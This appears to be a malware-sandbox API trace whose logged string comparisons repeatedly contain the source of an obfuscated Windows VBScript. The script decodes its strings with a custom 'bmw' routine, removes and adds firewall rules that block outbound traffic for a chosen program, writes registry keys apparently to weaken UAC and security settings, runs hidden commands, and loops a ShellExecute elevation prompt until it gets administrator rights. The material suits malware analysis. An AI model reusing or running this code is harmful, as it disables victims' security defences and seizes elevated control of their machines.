bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 28 [0222.970] wcsncmp (_String1="-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 32 [0222.970] wcsncmp (_String1="2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 37 [0222.970] wcsncmp (_String1=")\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 28 [0222.970] wcsncmp (_String1="\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -30 [0222.971] wcsncmp (_String1="\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = 